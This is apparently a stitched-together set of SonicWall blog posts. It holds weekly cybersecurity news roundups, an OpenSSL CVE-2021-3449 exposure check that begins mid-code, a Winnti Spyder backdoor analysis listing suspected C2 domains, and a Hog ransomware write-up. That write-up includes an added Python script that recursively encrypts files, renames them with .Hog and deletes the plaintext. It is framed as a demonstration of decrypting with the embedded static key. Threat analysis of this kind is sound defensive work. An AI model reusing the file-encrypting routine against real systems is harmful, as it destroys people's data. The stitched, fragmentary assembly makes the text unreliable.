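    print("linked against", ssl.OPENSSL_VERSION, "vulnerable:", library_vulnerable())
    old = (1, 1, 1, 10, 15)  # constructed tuple for 1.1.1j
    weak = server_context(disable_renegotiation=False)
    print("weak context on 1.1.1j exposed:", exposes_cve_2021_3449(weak, old))            # True
    print("hardened context on 1.1.1j exposed:", exposes_cve_2021_3449(server_context(), old))  # False
```

The configuration checks only narrow the window; the upgrade to 1.1.1k is what removes the NULL dereference, and a server that still negotiates TLS 1.2 with renegotiation enabled on an older 1.1.1 build remains crashable by a single unauthenticated client.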

Appendix – Discovered By:

  This issue was reported to OpenSSL on 17th March 2021 by Nokia. The fix was developed by Peter Kästle and Samuel Sapalski from Nokia.

Cybersecurity News & Trends – 04-02-21

This week, as lawmakers and researchers continued to unravel the details of the SolarWinds attack, another supply chain attack was uncovered — this time on PHP’s Git repository.


SonicWall in the News

Lacombe County fends off cyberattack — Red Deer Advocate

  • An attempted cyberattack on Lacombe County’s servers was ultimately prevented by the county’s SonicWall firewall.

2021 Partner Program Guide — CRN

  • SonicWall was recognized on a list of vendors who have 5-star channel partner programs.

SonicWall continues next-gen firewall refresh with NSa 3700 — Channelbuzz.ca

  • This article is about the new NSa 3700 firewall and next-gen upgrades from the March 25 launch, and features key quotes from Kayvon Sadeghi about the importance of this upgrade.

SonicWall expands its threat protection to protect heavily targeted sectors with the NSa 3700 — CRN India

  • This article is about the new NSa 3700 firewall and next-gen upgrades from the March 25 launch.

Leading Israeli IoT firm lands in US as worldwide malware attacks surge — ComputerWeekly

  • This article used data from SonicWall’s 2021 Cyber Threat Report to showcase the increase in malware and IoT attacks as the number of consumer-oriented IoT devices grows.

News Bits: SonicWall, Scality, Alluxio, Aerospike, Hammerspace, StarWind, Model9, & More — Storage Review

  • This article mentions the new NSa 3700 firewall and next-gen upgrades from the March 25 launch, and features key quotes from Kayvon Sadeghi about the importance of this upgrade.

2020 offered a ‘perfect storm’ for cybercriminals with ransomware attacks costing the industry $21B — Fierce Healthcare

  • This article used data from SonicWall’s 2021 Cyber Threat Report to showcase the increase in ransomware attacks on healthcare organizations.

Managed Security Services Provider (MSSP) News: 25 March 2021 — MSSP Alert

  • This article mentions the new NSa 3700 firewall and next-gen upgrades from the March 25 launch.

SonicWall Announces Security Hardware and Software Upgrades — ChannelPro Network

  • This article is about the new NSa 3700 firewall and next-gen upgrades from the March 25 launch, and features key quotes from Kayvon Sadeghi about the importance of this upgrade.

Industry News

North Korean hackers return, target infosec researchers in new operation — Ars Technica

  • North Korean government-sponsored hackers are back, this time with a new batch of social media profiles and a fake company that claims to offer offensive security services.

Ransomware tops U.S. cyber priorities, Homeland secretary says — Reuters

  • DHS Secretary Alejandro Mayorkas said that dealing with ransomware will be a top priority, highlighting the growing threat of the data-scrambling software.

U.S. to publish details on suspected Russian hacking tools used in SolarWinds espionage — Cyberscoop

  • The upcoming report sheds light on a historic espionage campaign that U.S. officials have, at times, been cautious to publicly detail.

Ubiquiti confirms extortion attempt following security breach — Cyberscoop

  • Networking device maker Ubiquiti has confirmed that it was the target of an extortion attempt following a January security breach, as revealed by a whistleblower earlier this week.

Whistleblower: Ubiquiti Breach “Catastrophic” — Krebs on Security

  • On Jan. 11, Ubiquiti, Inc. — a major vendor of IoT devices such as routers, network video recorders and security cameras — disclosed that a breach involving a third-party cloud provider had exposed customer account credentials.

Cybercriminals Publish Data Allegedly Stolen From Shell, Multiple Universities — Bleeping Computer

  • The FIN11 hacking group has published files that were allegedly stolen from oil and gas giant Shell, likely during a cybersecurity incident involving Accellion’s File Transfer Appliance (FTA) file sharing service.

Australia investigates reported hacks aimed at parliament, media — Cyberscoop

  • An apparent cyber incident knocked Australia’s Parliament House’s email system offline just as Australia’s Channel Nine broadcasting was interrupted by hackers over the weekend.

And that’s yet another UK education body under attack from ransomware: Servers, email, phones yanked offline — The Register

  • The Harris Federation, a not-for-profit charity responsible for running 50 primary and secondary academies in London and Essex, has become the latest UK education body to fall victim to ransomware.

PHP’s Git server hacked to add backdoors to PHP source code — Cyberscoop

  • In the latest software supply chain attack, the official PHP Git repository was hacked and tampered with.

Ukraine Investigating Phishing Software Used to Target Banks — Bloomberg

  • Phishing software was used to attack hundreds of banks and their clients in 11 countries, including the U.K, the U.S. and Mexico, the country’s Office of the Prosecutor General said in a statement.

More Ransomware Gangs Targeting Vulnerable Exchange Servers — Security Week

  • The Black Kingdom/Pydomer ransomware operators have joined the ranks of threat actors targeting the Exchange Server vulnerabilities that Microsoft disclosed in early March.

Ransomware admin is refunding victims their ransom payments — Bleeping Computer

  • After recently announcing the end of the operation, the administrator of Ziggy ransomware is now stating that they will also give the money back.

FBI exposes weakness in Mamba ransomware, DiskCryptor — Bleeping Computer

  • An alert from the U.S. Federal Bureau of Investigation about Mamba ransomware reveals a weak spot in the encryption process that could help targeted organizations recover from the attack without paying the ransom.

Cybersecurity News & Trends – 03-26-21

This week — with higher education institutions and electricity companies on high alert, and with the Microsoft Exchange server crisis raging on — it’s no wonder 82% say cyberterrorism is America’s top potential threat.


SonicWall in the News

IoT malware attacks saw a huge rise last year — Techradar

  • Data from SonicWall’s 2021 Cyber Threat Report suggests that IoT malware has been on the rise as the number of consumer-oriented IoT devices grows.

Phishing Email Warning Shows Cybercriminals Seizing on Tax Filing Delay, Vaccine Rollout Gallery — Channel Futures

  • Dmitriy Ayrapetov explains how bad actors are targeting vaccine distribution and takes a closer look at the threats caused by the remote workforce.

ICYMI: Our Channel News Roundup For the Week of March 15 — ChannelPro Network

  • SonicWall’s 2021 Cyber Threat Report was included in ChannelPro Network’s weekly news roundup.

India Saw Largest Spike In Malware Attacks In 2020: Report — ET CISO

A Pandemic Of Email Scams — Financial Times

  • SonicWall recently reported a 62% increase in ransomware attacks last year and a 74% increase in malware variants.

New SonicWall 2020 Research Shows Cyber Arms Race At Tipping Point — CIO Review India

  • This article spotlights SonicWall’s 2021 Cyber Threat Report.

Industry News

Lawmakers reintroduce legislation to secure internet-connected devices — The Hill

  • The Cyber Shield Act would create a voluntary cybersecurity certification program for IoT devices.

Ransomware operators are piling on already hacked Exchange servers — Ars Technica

  • The fallout from the Microsoft Exchange server crisis isn’t abating just yet.

Purple Fox Malware Targets Windows Machines With New Worm Capabilities — Threat Post

  • A new infection vector from the established malware puts internet-facing Windows systems at risk from SMB password brute-forcing.

Thousands of Exchange servers breached prior to patching, CISA boss says — Cyberscoop

  • A U.S. government cybersecurity official has warned organizations not to have a false sense of security when it comes to vulnerabilities in Microsoft Exchange Server software, noting that “thousands” of computer servers with updated software had already been breached.

Covid-19: Vaccines and vaccine passports being sold on darknet — BBC

  • Researchers say they have seen a “sharp increase” in vaccine-related darknet adverts, while the BBC has been unable to determine whether the vaccines being sold there are real.

UK colleges and unis urged to prepare for ransomware before it’s too late — The Register

  • There has been an uptick in attacks since schools reopened, warns the National Cyber Security Centre.

Electricity Distribution Systems at Increasing Risk of Cyberattacks, GAO Warns — Security Week

  • A newly published report from the U.S. Government Accountability Office describes the risks of cyberattacks on the electricity grid’s distribution systems, along with the scale of the potential impact of such attacks.

8 in 10 say cyberterrorism is top potential threat: Gallup — The Hill

  • According to the survey, 82% of respondents said cyberterrorism is a critical threat to the U.S.

TikTok Doesn’t Pose Overt U.S. National Security Threat, Researchers Say — The New York Times

  • A new study by university cybersecurity researchers found that the computer code underlying the TikTok app doesn’t pose an overt national security threat to the U.S.

Acer reportedly targeted with $50 million ransomware attack — ZDNet

  • The REvil ransomware gang has published various Acer documents, such as financial spreadsheets, bank balances and bank communications.

FBI warns of BEC attacks increasingly targeting US govt orgs — Bleeping Computer

  • The Federal Bureau of Investigation is warning U.S. private sector companies about an increase in business email compromise (BEC) attacks targeting state, local, tribal, and territorial (SLTT) government entities.

Microsoft Defender Antivirus now automatically mitigates Exchange Server vulnerabilities — ZDNet

  • Mitigation fixes will be applied automatically in a renewed effort by Microsoft to contain security incidents caused by the bugs.

SolarWinds-linked hacking group SilverFish abuses enterprise victims for sandbox tests — ZDNet

  • Existing victim networks are used as a novel form of sandbox, as cybercriminals exploit them to test out payloads.

In Case You Missed It

China’s “Winnti” Spyder Module

Overview:

SonicWall’s Capture Labs Threat Research Team recently captured and evaluated a new malicious sample, termed Spyder, from China’s “Winnti” hacking group. This backdoor is written in C++ and designed to run on 64-bit Windows. The module is used in targeted attacks on information storage systems: it collects information about compromised devices, executes malicious payloads, coordinates script execution and communicates with its C&C server. The module is loaded by the MSDTC system service using a well-known DLL hijacking technique, and the function names in the module’s export table mirror the exported functions of the apphelp.dll system library.

Static Information & Error Checking Information:

Dynamic Information:

Dll Main inside x64 debug:

Encrypted PE File in memory:

Call to Shellcode see RAX:

Dll Main inside Encrypted PE File:

Network Artifacts:

Get Request:

Possible domains in the wild:

  • sidc.everywebsite.us
  • snoc.hostingupdate.club
  • wntc.livehost.live
  • hccadkml89.dnslookup.services
  • koran.junlper.com
  • nted.tg9f6zwkx.icu
  • sidcfpprx14.in.ril.com
  • sidcfpprx01.in.ril.com
  • sidcfpprx25.in.ril.com
  • sidcfpprx10.in.ril.com

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: Spyder.DN (Trojan)

Appendix:

Sample SHA-1 Hash: 41777d592dd91e7fb2a1561aff018c452eb32c28

Hog ransomware decrypts victims who join their Discord server spreading in the wild

The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Hog ransomware actively spreading in the wild.

The Hog ransomware encrypts the victim’s files with a strong encryption algorithm and only decrypts them if they join the developer’s Discord server.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\[Filename].Hog

Once the computer is compromised, the ransomware runs the following commands:

When Hog is started, it creates and assigns a unique ID number to the victim, then scans all local drives for data files to encrypt.

When encrypting files it uses the AES encryption algorithm and encrypts all files except those with the following extensions:

.exe .dll .ini .scr .sys .vmx .vmdk

The ransomware encrypts all the files and appends the [.Hog] extension onto each encrypted file’s filename.


If the victim has joined the Discord server, the ransomware decrypts the victim’s files using a static key embedded in the ransomware.

After encrypting all personal documents, the ransomware displays the following ransom note, stating that the computer’s files have been encrypted and explaining how to unlock them.
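The infection cycle above amounts to three rules (skip the listed extensions, append .Hog, decrypt with a key that ships inside the binary), and the last rule is the weakness: a key that is static and embedded can be lifted from any sample and used to write a decryptor, so no one needs to join the Discord server. The block below is an added example that reproduces that cycle end to end; it is not the ransomware’s code and not SonicWall’s. Because the Python standard library has no AES, the file cipher is a counter-mode stream construction built from HMAC-SHA256 used as a stand-in for AES-CTR, and the key value is hypothetical (the write-up says the key is static, not what it is). The victim directory and its contents are constructed test data.

```python
"""Hog-style file selection, encryption and static-key recovery.

Added example, not the ransomware's code. HMAC-SHA256 in counter mode stands
in for AES (not in the standard library); the key below is hypothetical.
"""
import hashlib
import hmac
import os
import tempfile
from pathlib import Path

# Extensions the write-up says Hog leaves alone, plus its own marker suffix.
EXCLUDED_EXTENSIONS = {".exe", ".dll", ".ini", ".scr", ".sys", ".vmx", ".vmdk"}
ENCRYPTED_SUFFIX = ".Hog"

# Hypothetical stand-in for the static key embedded in the binary. Anyone with
# the sample can read it out, which is exactly why a decryptor is possible.
STATIC_KEY = hashlib.sha256(b"hypothetical-embedded-key").digest()
NONCE_LEN = 16


def should_encrypt(path) -> bool:
    """Hog's selection rule: everything except the excluded extensions.
    Already-encrypted files are skipped so a second pass cannot double-encrypt."""
    path = Path(path)
    if path.suffix == ENCRYPTED_SUFFIX:
        return False
    return path.suffix.lower() not in EXCLUDED_EXTENSIONS


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Counter-mode stream cipher: block i of keystream = HMAC(key, nonce || i).
    XOR is its own inverse, so the same call encrypts and decrypts."""
    out = bytearray()
    for block_no in range((len(data) + 31) // 32):
        block = hmac.new(key, nonce + block_no.to_bytes(8, "big"), hashlib.sha256).digest()
        chunk = data[block_no * 32:(block_no + 1) * 32]
        out.extend(a ^ b for a, b in zip(chunk, block))
    return bytes(out)


def encrypt_file(path: Path, key: bytes = STATIC_KEY) -> Path:
    """Write nonce || ciphertext to <name>.Hog and remove the plaintext."""
    nonce = os.urandom(NONCE_LEN)
    target = path.with_name(path.name + ENCRYPTED_SUFFIX)
    target.write_bytes(nonce + keystream_xor(key, nonce, path.read_bytes()))
    path.unlink()
    return target


def decrypt_file(path: Path, key: bytes = STATIC_KEY) -> Path:
    """The decryptor: strip .Hog, recover the nonce and undo the keystream."""
    blob = path.read_bytes()
    nonce, body = blob[:NONCE_LEN], blob[NONCE_LEN:]
    original = path.with_name(path.name[: -len(ENCRYPTED_SUFFIX)])
    original.write_bytes(keystream_xor(key, nonce, body))
    path.unlink()
    return original


def encrypt_tree(root: Path, key: bytes = STATIC_KEY) -> list:
    # sorted() materialises the listing first so newly written .Hog files are not revisited
    return [encrypt_file(p, key) for p in sorted(root.rglob("*")) if p.is_file() and should_encrypt(p)]


def decrypt_tree(root: Path, key: bytes = STATIC_KEY) -> list:
    return [decrypt_file(p, key) for p in sorted(root.rglob("*" + ENCRYPTED_SUFFIX)) if p.is_file()]


def demo() -> dict:
    """Constructed victim directory: run the cycle, then recover with the embedded key."""
    files = {"report.docx": b"quarterly numbers", "photo.jpg": b"\xff\xd8\xff",
             "app.exe": b"MZ", "config.ini": b"[x]"}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, content in files.items():
            (root / name).write_bytes(content)
        encrypted = encrypt_tree(root)
        names_after = sorted(p.name for p in root.iterdir())
        decrypt_tree(root)
        restored = {p.name: p.read_bytes() for p in root.iterdir()}
    return {"encrypted": sorted(p.name for p in encrypted),
            "names_after": names_after,
            "restored_ok": restored == files}


if __name__ == "__main__":
    print(demo())
```

The recovery step uses nothing the attacker controls: the key is a constant in the sample, the nonce is stored in the file header, so the `decrypt_tree` call is all a responder needs once the key has been read out of the binary.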

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: HogRansom.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 03-19-21

This week, SonicWall released its biggest trove of threat intelligence yet: The 2021 SonicWall Cyber Threat Report.


SonicWall in the News

Microsoft Office Files Now Used By Hackers to Spread Malware: IoT Under Attack — Tech Times

  • Tech Times covered SonicWall’s 2021 Cyber Threat Report, highlighting the surge in malicious Office file attacks.

Election security report calls out Russian, Iranian influence ops. Remediation progress. Ukraine finds Russian cyberespionage — CyberWire

  • SonicWall’s 2021 Cyber Threat Report was included under the “Cyber Trends” section of the newsletter.

Threat Actors Thriving on the Fear and Uncertainty of Remote Workforces — Help Net Security

  • Help Net Security shared an article on SonicWall’s 2021 Threat Report, highlighting that cyber criminals preyed on the new remote work reality.

Ransomware Up 62 Percent Since 2019 — BetaNews

  • BetaNews shared an article on SonicWall’s 2021 Threat Report, highlighting the growth in ransomware.

New SonicWall 2020 Research Shows Cyber Arms Race At Tipping Point — CRN

  • This article features the findings from SonicWall’s 2021 Cyber Threat Report.

SonicWall: Pandemic exposes record-breaking cyber attacks — Mobile News

  • This article features the findings from SonicWall’s 2021 Cyber Threat Report.

Ransomware and IoT Malware Detections Surge By Over 60% — InfoSecurity Magazine

  • InfoSecurity Magazine covered SonicWall’s 2021 Cyber Threat Report, highlighting the double-digit surge in ransomware and IoT malware.

Cybercrime Saw an ‘Explosion’ in 2020 — ITProPortal

  • ITProPortal covered SonicWall’s 2021 Cyber Threat Report, highlighting that ransomware, cryptojacking and malicious Office files were the most popular vectors for cybercrime in 2020.

ChannelPro Weekly Podcast: Episode #178 — ChannelPro Weekly Podcast

  • This podcast features an interview with Dmitriy Ayrapetov discussing the impact the pandemic had on cybersecurity and the cybersecurity trends of 2021.

Industry News

More than $4 billion in cybercrime losses reported to FBI in 2020 — FBI Internet Crime Report 2021

  • American victims reported $4.2 billion in losses as a result of cybercrime and internet fraud to the FBI in 2020, a roughly 20% uptick from 2019.

Attackers are trying awfully hard to backdoor iOS developers’ Macs — Ars Technica

  • Researchers said they’ve found a trojanized code library in the wild that attempts to install advanced surveillance malware on the Macs of iOS software developers.

Ransom Payments Have Nearly Tripled — Dark Reading

  • In 2020, ransomware targeted the manufacturing sector, healthcare organizations and construction companies, with the average ransom reaching $312,000, a report finds.

U.S. taxpayers targeted with RAT malware in ongoing phishing attacks — Bleeping Computer

  • U.S. taxpayers are being targeted by phishing attacks attempting to take over their computers using malware and steal sensitive personal and financial information.

$4,000 COVID-19 ‘Relief Checks’ Cloak Dridex Malware — Threat Post

  • The American Rescue Act is the latest zeitgeisty lure being circulated in an email campaign.

Mimecast Says SolarWinds Hackers Stole Source Code — SecurityWeek

  • Email security company Mimecast on Tuesday said it completed its forensic investigation into the impact of the SolarWinds supply chain attack and revealed that the threat actor managed to steal some source code.

Buffalo Public Schools cancels classes after cyberattack — Cyberscoop

  • Ransomware attackers appear to have hit Buffalo Public Schools in recent days, bringing the school system’s plans for remote classes and in-person learning to a halt on Friday.

FBI warns of escalating Pysa ransomware attacks on education orgs — Bleeping Computer

  • The Federal Bureau of Investigation (FBI) Cyber Division has warned system administrators and cybersecurity professionals of increased Pysa ransomware activity targeting educational institutions.

Bitcoin surges past $60,000 for first time — BBC

  • Bitcoin, which has more than tripled in value since the end of last year, has been powered on by well-known companies adopting it as a method of payment.

Exclusive: Microsoft could reap more than $150 million in new U.S. cyber spending, upsetting some lawmakers — Reuters

  • Microsoft stands to receive nearly a quarter of COVID-19 relief funds destined for U.S. cybersecurity defenders, angering some lawmakers who don’t want to increase funding for a company whose software was recently at the heart of two big hacks.

Molson Coors says cyberattack disrupted beer brewing — Cyberscoop

  • Molson Coors, one of the biggest beer companies in the U.S., didn’t provide many specifics about the cyberattack.

With Spectre Still Lurking, Google Looks to Protect the Web — Wired

  • Researchers from Google have developed a proof-of-concept that shows the hazard Spectre attacks pose to the browser.

Ransomware now attacks Microsoft Exchange servers with ProxyLogon exploits — Bleeping Computer

  • A new ransomware called ‘DEARCRY’ is targeting Microsoft Exchange servers, with one victim stating they were infected via the ProxyLogon vulnerabilities.

In Case You Missed It